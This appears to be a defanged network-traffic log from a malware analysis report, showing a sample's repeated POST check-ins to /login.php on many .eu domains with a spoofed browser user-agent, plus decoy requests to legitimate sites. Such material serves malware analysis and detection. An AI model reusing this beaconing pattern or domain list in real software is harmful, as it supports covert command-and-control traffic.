<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">.<HTML>.<HEAD>.<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2">.<meta http-equiv="Content-Language" content="pl">..<style type="text/css">.. body {font-family: arial; background: #ffffff; font-size: 8px color: white;}.. td { font-family: verdana; font-size: 11px;color: black; }.. p { font-family: verdana; font-size: 18px; color: black; text-align: center;}... a:hover {text-decoration: none; color: white}.</style>.<TITLE>.(none).</TITLE>.</HEAD>.<BODY style="bgcolor: #FFFFFF">......<div style="text-align:center;">.<br>.<table width="100%" border="0" cellpadding="0" cellspacing="0" style="align: center">.<tr><td style="width: 100%" align="center">..<table width="574" style="background-image:url(/errordocs/pasek.gif); height: 21px;" border="0" cellpadding="0" cellspacing="0" >...<tr>....<td style="text-align: left">....<div style="margin-left:45px"><b>Error</b></div>....</td>...</tr>...</table>..<table width="574" border="0" cellpadding="1" cellspacing="1" style="background-color: #9c9c9c;text-align:center;">...<tr>....<td style="background-color: #ffffff">.....<br>.....<table style="background-color: #ffffff">......<tr>.......<td align="center" valign="top"><IMG SRC="/errordocs/error.gif" ALT="eroor"></td>.......<td colspan="2" al

<<< skipped >>>

GET /en/ HTTP/1.0

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: corporate.evonik.com

Pragma: no-cache

HTTP/1.1 301 Moved Permanently

Cache-Control: private

Content-Length: 0

Location: hXXp://corporate.evonik.com/en/Pages/default.aspx

MicrosoftSharePointTeamServices: 12.0.0.6520

Date: Mon, 10 Nov 2014 20:01:24 GMT

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: pumot.eu

Content-Length: 9

Pragma: no-cache

....~7.~'

HTTP/1.1 404 Not Found

Date: Mon, 10 Nov 2014 20:01:13 GMT

Server: Apache

Content-Length: 1363

X-Frame-Options: deny

Connection: close

Content-Type: text/html

<!DOCTYPE html>.<html>. <head>. <meta charset="utf-8">. <style type="text/css">. html, body, #partner, iframe {. height:100%;. width:100%;. margin:0;. padding:0;. border:0;. outline:0;. font-size:100%;. vertical-align:baseline;. background:transparent;. }. body {. overflow:hidden;. }. </style>. <meta content="NOW" name="expires">. <meta content="index, follow, all" name="GOOGLEBOT">. <meta content="index, follow, all" name="robots">. <!-- Following Meta-Tag fixes scaling-issues on mobile devices -->. <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport">. </head>. <body>. <div id="partner"></div>. <script type="text/javascript">. document.write(. '<script type="text/javascript" language="JavaScript"'. 'src="//sedoparking.com/frmpark/'. window.location.host '/'. '1und1parking6'. '/park.js">'. '<\/script>'. );. </script>. </body>.</html>..

<<< skipped >>>

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: gater.eu

Content-Length: 9

Pragma: no-cache

....~7.~'

HTTP/1.1 301 Moved Permanently

Date: Mon, 10 Nov 2014 20:01:32 GMT

Server: Apache

Location: hXXp://VVV.gater.eu/login.php

Content-Length: 237

Connection: close

Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>301 Moved Permanently</title>.</head><body>.<h1>Moved Permanently</h1>.<p>The document has moved <a href="hXXp://VVV.gater.eu/login.php">here</a>.</p>.</body></html>...

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: vocab.eu

Content-Length: 9

Pragma: no-cache

....~7.~'

HTTP/1.1 404 Not Found

Server: nginx

Date: Mon, 10 Nov 2014 20:01:29 GMT

Content-Type: text/html; charset=utf-8

Connection: close

X-Powered-By: PHP/5.4.26-1~dotdeb.1

Set-Cookie: PHPSESSID=envpqbkkkiv4cm5eun0u8hgar1; path=/

P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"

Cache-Control: no-cache

Pragma: no-cache

<div id="saleslander">. <div class="inner clearfix">.. <span class="icon"></span>. . <h1>vocab.eu<span> is for sale!</span></h1>. <h3>Buying this domain means full control and ownership.</h3>. <div class="domain_actions">. <div class="box_payments">. <p>Price in Words:<br/><b>nine hundred and ninety-nine</b></p>. <p>Domain Punycode:<br/><b class="punycode">vocab.eu</b></p>. <p>Payment options:</p><p class="paymentimg">. <img style="border:0;" src="hXXp://vocab.eu/images/payment/visa.png" alt="Buy and register a domain with VISA" title="Buy and register a domain with VISA" />. <img style="height:28px;" src="http://vocab.eu/images/payment/visa_verified.png" alt="Buy and register a domain with VISA" title="Buy and register a domain with VISA" />. <img style="border:0;" src="hXXp://vocab.eu/images/payment/mastercard.png" alt="Buy and register a domain with Mastercard" title="Buy and register a domain with Mastercard" />. <img style="height:28px;" src="hXXp://vocab.eu/images/payment/mastercard_securecode.png" alt="Buy and register a domain with Mastercard" title="Buy and register a domain with Mastercard" />

<<< skipped >>>

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: volym.eu

Content-Length: 9

Pragma: no-cache

....~7.~'

HTTP/1.1 500 Internal Server Error

Server: nginx/1.0.14

Date: Mon, 10 Nov 2014 20:01:13 GMT

Content-Type: text/html; charset=iso-8859-1

Connection: close

Content-Length: 640

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>500 Internal Server Error</title>.</head><body>.<h1>Internal Server Error</h1>.<p>The server encountered an internal error or.misconfiguration and was unable to complete.your request.</p>.<p>Please contact the server administrator,. drift@loopia.se and inform them of the time the error occurred,.and anything you might have done that may have.caused the error.</p>.<p>More information about this error may be available.in the server error log.</p>.<hr>.<address>Apache/2.2.22 (FreeBSD) PHP/5.3.10 with Suhosin-Patch Server at volym.eu Port 80</address>.</body></html>...

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: galen.eu

Content-Length: 9

Pragma: no-cache

Cookie: PHPSESSID=m3a1jsr8297hhd5f2r8nvd0so2

....~7.~'

HTTP/1.1 404 Not Found

Server: nginx

Date: Mon, 10 Nov 2014 20:01:28 GMT

Content-Type: text/html; charset=utf-8

Connection: close

X-Powered-By: PHP/5.4.26-1~dotdeb.1

P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"

Cache-Control: no-cache

Pragma: no-cache

<div id="saleslander">. <div class="inner clearfix">.. <span class="icon"></span>. . <h1>galen.eu<span> is for sale!</span></h1>. <h3>Buying this domain means full control and ownership.</h3>. <div class="domain_actions">. <div class="box_payments">. <p>Price in Words:<br/><b>two thousand, four hundred and ninety-nine</b></p>. <p>Domain Punycode:<br/><b class="punycode">galen.eu</b></p>. <p>Payment options:</p><p class="paymentimg">. <img style="border:0;" src="hXXp://galen.eu/images/payment/visa.png" alt="Buy and register a domain with VISA" title="Buy and register a domain with VISA" />. <img style="height:28px;" src="hXXp://galen.eu/images/payment/visa_verified.png" alt="Buy and register a domain with VISA" title="Buy and register a domain with VISA" />. <img style="border:0;" src="http://galen.eu/images/payment/mastercard.png" alt="Buy and register a domain with Mastercard" title="Buy and register a domain with Mastercard" />. <img style="height:28px;" src="hXXp://galen.eu/images/payment/mastercard_securecode.png" alt="Buy and register a domain with Mastercard" title="Buy and register a domain with Mas

<<< skipped >>>

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: galev.eu

Content-Length: 9

Pragma: no-cache

....~7.~'

HTTP/1.1 404 Not Found

Date: Mon, 10 Nov 2014 20:01:34 GMT

Content-Type: text/html

Content-Length: 767

Connection: close

Server: Apache/2

Last-Modified: Fri, 20 Jun 2014 19:46:10 GMT

Accept-Ranges: bytes

<!DOCTYPE HTML>.<html>.. <head>. <title>404 Error - Page Not Found</title>.. <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script>. <script type="text/javascript" language="JavaScript">. var url = 'hXXp://notfound01.domainparkingserver.net/?domain_name='. document.domain '&a_id=127828';.. $(document).ready(function() {. $('#content').attr('src', url);. });. </script>. </head>. <body>. <iframe src="hXXp://notfound01.domainparkingserver.net/" id="content". frameborder="0" height="800" scrolling="auto" width="100%">.. <!-- browser does not support iframe's -->.. </iframe>. </body>..</html>...

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: pumot.eu

Content-Length: 9

Pragma: no-cache

....~7.~'

HTTP/1.1 404 Not Found

Date: Mon, 10 Nov 2014 20:01:12 GMT

Server: Apache

Content-Length: 1363

X-Frame-Options: deny

Connection: close

Content-Type: text/html

<!DOCTYPE html>.<html>. <head>. <meta charset="utf-8">. <style type="text/css">. html, body, #partner, iframe {. height:100%;. width:100%;. margin:0;. padding:0;. border:0;. outline:0;. font-size:100%;. vertical-align:baseline;. background:transparent;. }. body {. overflow:hidden;. }. </style>. <meta content="NOW" name="expires">. <meta content="index, follow, all" name="GOOGLEBOT">. <meta content="index, follow, all" name="robots">. <!-- Following Meta-Tag fixes scaling-issues on mobile devices -->. <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport">. </head>. <body>. <div id="partner"></div>. <script type="text/javascript">. document.write(. '<script type="text/javascript" language="JavaScript"'. 'src="//sedoparking.com/frmpark/'. window.location.host '/'. '1und1parking6'. '/park.js">'. '<\/script>'. );. </script>. </body>.</html>..

<<< skipped >>>

GET /en/Pages/default.aspx HTTP/1.0

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: corporate.evonik.com

Pragma: no-cache

HTTP/1.1 200 OK

Cache-Control: private

Content-Length: 23925

Content-Type: text/html; charset=utf-8

Expires: Mon, 10 Nov 2014 20:19:50 GMT

MicrosoftSharePointTeamServices: 12.0.0.6520

Date: Mon, 10 Nov 2014 20:01:25 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "hXXp://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<!-- 52 --> ..<html xmlns="hXXp://VVV.w3.org/1999/xhtml" dir="ltr">..<head>..<!-- Use IE7 mode -->..<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta http-equiv="Expires" content="0" /><title>Evonik Industries - Specialty Chemicals</title>..<link id="ctl00_MainStylesheetPath" rel="stylesheet" type="text/css" href="/_layouts/styles/evonik/internet/styles-centered.css?rev=YvHpTeHMNpqwo7mx8XNqzA==" media="screen,projection" /> ..<!--[if IE]>..<link id="ctl00_IEStylesheetPath" rel="stylesheet" type="text/css" href="/_layouts/styles/evonik/internet/styles-ie.css?rev=7fPusyX4Cm7TTZU3eQ3xSw==" media="screen,projection" /> ..<![endif]-->..<link id="ctl00_PrintStylesheetRelativePath" rel="stylesheet" type="text/css" href="/_layouts/styles/evonik/internet/print.css?rev=Og8NEt5769aVOx3S3YGJ7A==" media="print" />..<script language="javascript" type="text/javascript">../* set variables */..RESOURCES_PATH = "./_layouts/";..CURRENT_SITE_TYPE = "market_site";..</script>..<script language="javascript" id="ctl00_jquery" type="text/javascript" src="/_layouts/websites/viscript/jquery.js?rev=uxIrM9ZNAqEGvyIwstQa8A==">..</script><script language="javascript" id="ctl00_RelativeScriptLink1" type="text/

<<< skipped >>>

GET /login.php HTTP/1.0

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: VVV.dr.dk

Pragma: no-cache

HTTP/1.1 404 Not Found

Content-Type: text/html

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

X-Template: legacy

X-Cacheable: YES:default_ttl=119.000

Cache-Control:

Date: Mon, 10 Nov 2014 20:01:21 GMT

X-Varnish: 2322934300 2322933706

Age: 0

Via: 1.1 varnish

Connection: close

X-Via: varnishol04.dr.dk (172.18.120.164:80)

X-Cache: HIT

X-WebEdge: 2519

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "hXXp://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="hXXp://VVV.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>..<title>404 - File or directory not found.</title>..<style type="text/css">..<!--..body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px 10px 15px;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:1.7em;margin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;..background-color:#555555;}..#content{margin:0 0 0 2%;position:relative;}...content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}..-->..</style>..</head>..<body>..<div id="header"><h1>Server Error</h1></div>..<div id="content">.. <div class="content-container"><fieldset>.. <h2>404 - File or directory not found.</h2>.. <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>.. </fieldset></div>..</div>..</body>..</html>....

<<< skipped >>>

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: lykil.eu

Content-Length: 9

Pragma: no-cache

....~7.~'

HTTP/1.1 404 Not Found

Server: nginx/1.0.14

Date: Mon, 10 Nov 2014 20:01:19 GMT

Content-Type: text/html; charset=UTF-8

Connection: close

Vary: X-Forwarded-For

X-Powered-By: PHP/5.3.10

X-Pingback: hXXp://lykil.se/xmlrpc.php

Expires: Wed, 11 Jan 1984 05:00:00 GMT

Cache-Control: no-cache, must-revalidate, max-age=0

Pragma: no-cache

Content-Length: 7146

Accept-Ranges: bytes

X-Varnish: 2462812295

Age: 0

Via: 1.1 varnish

X-Loopia-Cache: MISS

<!DOCTYPE html>.<html lang="sv-SE" prefix="og: hXXp://ogp.me/ns# fb: hXXp://ogp.me/ns/fb#">.<head>.<meta charset="UTF-8" />.<title>404 Not Found | lykil</title>.<link rel="profile" href="hXXp://gmpg.org/xfn/11" />.<link rel="stylesheet" type="text/css" media="all" href="hXXp://lykil.se/wp-content/themes/page7/style.css" />.<link rel="pingback" href="hXXp://lykil.se/xmlrpc.php" />..<!-- SEO Ultimate (hXXp://VVV.seodesignsolutions.com/wordpress-seo/) -->.<!-- /SEO Ultimate -->..<link rel='stylesheet' id='frm-forms-css' href='hXXp://lykil.se/wp-content/plugins/formidable/css/frm_display.css?ver=1.07.04' type='text/css' media='all' />.<script type='text/javascript' src='hXXp://lykil.se/wp-includes/js/jquery/jquery.js?ver=1.11.1'></script>.<script type='text/javascript' src='hXXp://lykil.se/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1'></script>.<link rel="EditURI" type="application/rsd xml" title="RSD" href="hXXp://lykil.se/xmlrpc.php?rsd" />.<link rel="wlwmanifest" type="application/wlwmanifest xml" href="hXXp://lykil.se/wp-includes/wlwmanifest.xml" /> .<meta name="generator" content="WordPress 4.0" />.<script src="http://lykil.se/wp-content/themes/page7/js/superfish-combined.js"></script>.<script src="hXXp://lykil.se/wp-content/themes/page7/js/jquery.cycle.all.min.js"></script>.<script src="hXXp://lykil.se/wp-content/themes/page7/js/script.js"></script>.&l

<<< skipped >>>

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: purol.eu

Content-Length: 9

Pragma: no-cache

....~7.~'

HTTP/1.1 500 Internal Server Error

Date: Mon, 10 Nov 2014 20:01:12 GMT

Server: Apache

Content-Length: 2072

Connection: close

Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">..<html>.<head>..<title>Error 500 - Internal server error</title>.</head>..<body bgcolor="White" text="Black">...<table cellspacing="0" cellpadding="0" width="100%" height="100%" border="0">.<tr>..<td align="center" valign="middle">......<table border="0" cellspacing="0" cellpadding="0">...<tr>....<td rowspan="5" valign="top"><img src="/spicons/server.jpg" width=163 height=177 alt="" border="0"></td>....<td colspan="4"><img src="/spicons/mrblue.gif" width="500" height=2 alt="" border="0"></td>....<td><img src="/spicons/undercover.gif" width=1 height=2 alt="" border="0"></td>...</tr><tr>....<td rowspan="4" valign="bottom"><img src="/spicons/ecke.gif" width=14 height=43 alt="" border="0"></td>......<td valign="middle" align="center" rowspan="2">.....<table cellspacing="1" cellpadding="0" width=470 border="0">.....<tr>......<td><font face="Verdana, Helvetica, sans-serif" size="5" color="Red"><b>Error 500 - Internal server error</b></font><br><img src="/spicons/undercover.gif" width=14 height=5 alt="" border="0"><br></td>.....</tr><tr>......<td><font face="Verdana, Helvetica, sans-serif" size="2" color="Black">The server encountered an unexpected condition which prevented it from fulfilling the request.&

<<< skipped >>>

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: lysen.eu

Content-Length: 9

Pragma: no-cache

....~7.~'

HTTP/1.1 301 Moved Permanently

Date: Mon, 10 Nov 2014 20:01:20 GMT

Server: Apache

X-UD-Host: webspace.udag.de

X-UD-Method: header

Location: hXXp://VVV.dr.dk/login.php

Connection: close

Vary: Accept-Encoding

Content-Length: 0

Content-Type: text/html

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: lyran.eu

Content-Length: 9

Pragma: no-cache

....~7.~'

HTTP/1.1 404 Not Found

Server: Apache

Vary: Accept-Encoding

Content-Type: text/html; charset=iso-8859-1

Content-Length: 207

Accept-Ranges: bytes

Date: Mon, 10 Nov 2014 20:01:34 GMT

X-Varnish: 1001492731

Age: 0

Via: 1.1 varnish

Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL /login.php was not found on this server.</p>.</body></html>...

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: gatun.eu

Content-Length: 9

Pragma: no-cache

....~7.~'

HTTP/1.1 404 Not Found

Server: nginx/1.2.4

Date: Mon, 10 Nov 2014 20:01:00 GMT

Content-Type: text/html; charset=utf-8

Connection: close

X-Powered-By: PHP/5.3.13

Set-Cookie: 22afb07fb7b37e411b809b5a50bb58a4=e3d67bf7a2853f95840a6b5a8f632b61; path=/; HttpOnly

P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"

Status: 404 Article not found

Cache-Control: no-cache

Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xmlns="hXXp://VVV.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir="ltr">..<head>...<title>404 - Error: 404</title>...<link rel="stylesheet" href="/templates/gatun_jslab/css/style.css" type="text/css" />..</head>..<body>..<div class="box404"><img src="/templates/gatun_jslab/images/404.png" alt="" /></div>.. <!--...<div class="error">....<div id="outline">....<div id="errorboxoutline">.....<div id="errorboxheader">404 - Article not found</div>.....<div id="errorboxbody">.....<p><strong>You may not be able to visit this page because of:</strong></p>......<ol>.......<li>an <strong>out-of-date bookmark/favourite</strong></li>.......<li>a search engine that has an <strong>out-of-date listing for this site</strong></li>.......<li>a <strong>mistyped address</strong></li>.......<li>you have <strong>no access</strong> to this page</li>.......<li>The requested resource was not found.</li>.......<li>An error has occurred while processing your request.</li>......</ol>.....<p><strong>Please try one of the following pages:</strong></p>......<ul>.......<li><a href="/index.php" title="Go to the Home P

<<< skipped >>>

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: purel.eu

Content-Length: 9

Pragma: no-cache

....~7.~'

HTTP/1.1 404 Not Found

Date: Mon, 10 Nov 2014 20:01:33 GMT

Server: Apache

Vary: Accept-Encoding

Content-Length: 207

Connection: close

Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL /login.php was not found on this server.</p>.</body></html>...

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: galik.eu

Content-Length: 9

Pragma: no-cache

....~7.~'

HTTP/1.1 404 Not Found

Date: Mon, 10 Nov 2014 20:01:20 GMT

Server: Apache/2.2.22 (Debian)

Last-Modified: Wed, 03 Sep 2014 09:20:02 GMT

ETag: "1007b4-70e-50225bda086dd"

Accept-Ranges: bytes

Content-Length: 1806

Vary: Accept-Encoding

Connection: close

Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="hXXp://VVV.w3.org/1999/xhtml" xml:lang="en" lang="en">.<head>. <title>ERROR 404 - Not Found!</title>. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />. <meta name="robots" content="noindex" />. <style type="text/css"><!--. body {. color: #444444;. background-color: #EEEEEE;. font-family: 'Trebuchet MS', sans-serif;. font-size: 80%;. }. h1 {}. h2 { font-size: 1.2em; }. #page{. background-color: #FFFFFF;. width: 60%;. margin: 24px auto;. padding: 12px;. }. #header {. padding: 6px ;. text-align: center;. }. .status3xx { background-color: #475076; color: #FFFFFF; }. .status4xx { background-color: #C55042; color: #FFFFFF; }. .status5xx { background-color: #F2E81A; color: #000000; }. #content {. padding: 4px 0 24px 0;. }. #footer {. color: #666666;. background: #f9f9f9;. padding: 10px 20px;. border-top: 5px #efefef solid;. font-size: 0.8em;. text-align: center;. }. #footer a {. color: #999999;. }. --></style>.</head>.<body>. <div id="page">. <div id="header" class="status4xx">. <h1>ERROR 404 - Not Found!</h1>. </div>. <div id="content"

<<< skipped >>>

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: galin.eu

Content-Length: 9

Pragma: no-cache

....~7.~'

HTTP/1.0 301 Moved Permanently

Location: hXXp://VVV.galin.eu/login.php

Content-Length: 0

Connection: close

Date: Mon, 10 Nov 2014 20:01:00 GMT

Server: lighttpd

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: lymos.eu

Content-Length: 9

Pragma: no-cache

....~7.~'

HTTP/1.1 404 Not Found

Content-Length: 1635

Content-Type: text/html

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Date: Mon, 10 Nov 2014 20:01:31 GMT

Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "hXXp://VVV.w3.org/TR/html4/strict.dtd">..<HTML><HEAD><TITLE>The page cannot be found</TITLE>..<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">..<STYLE type="text/css">.. BODY { font: 8pt/12pt verdana }.. H1 { font: 13pt/15pt verdana }.. H2 { font: 8pt/12pt verdana }.. A:link { color: red }.. A:visited { color: maroon }..</STYLE>..</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>..<h1>The page cannot be found</h1>..The page you are looking for might have been removed, had its name changed, or is temporarily unavailable...<hr>..<p>Please try the following:</p>..<ul>..<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>..<li>If you reached this page by clicking a link, contact.. the Web site administrator to alert them that the link is incorrectly formatted...</li>..<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>..</ul>..<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>..<hr>..<p>Technical Information (for support personnel)</p>..<ul>..<li>Go to <a href="hXXp://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> a

<<< skipped >>>

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: galev.eu

Content-Length: 9

Pragma: no-cache

....~7.~'

HTTP/1.1 404 Not Found

Date: Mon, 10 Nov 2014 20:01:34 GMT

Content-Type: text/html

Content-Length: 767

Connection: close

Server: Apache/2

Last-Modified: Fri, 20 Jun 2014 19:46:10 GMT

Accept-Ranges: bytes

<!DOCTYPE HTML>.<html>.. <head>. <title>404 Error - Page Not Found</title>.. <script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script>. <script type="text/javascript" language="JavaScript">. var url = 'hXXp://notfound01.domainparkingserver.net/?domain_name='. document.domain '&a_id=127828';.. $(document).ready(function() {. $('#content').attr('src', url);. });. </script>. </head>. <body>. <iframe src="hXXp://notfound01.domainparkingserver.net/" id="content". frameborder="0" height="800" scrolling="auto" width="100%">.. <!-- browser does not support iframe's -->.. </iframe>. </body>..</html>...

POST /login.php HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: lykil.eu

Content-Length: 9

Pragma: no-cache

....~7.~'

HTTP/1.1 404 Not Found

Server: nginx/1.0.14

Date: Mon, 10 Nov 2014 20:01:18 GMT

Content-Type: text/html; charset=UTF-8

Connection: close

Vary: X-Forwarded-For

X-Powered-By: PHP/5.3.10

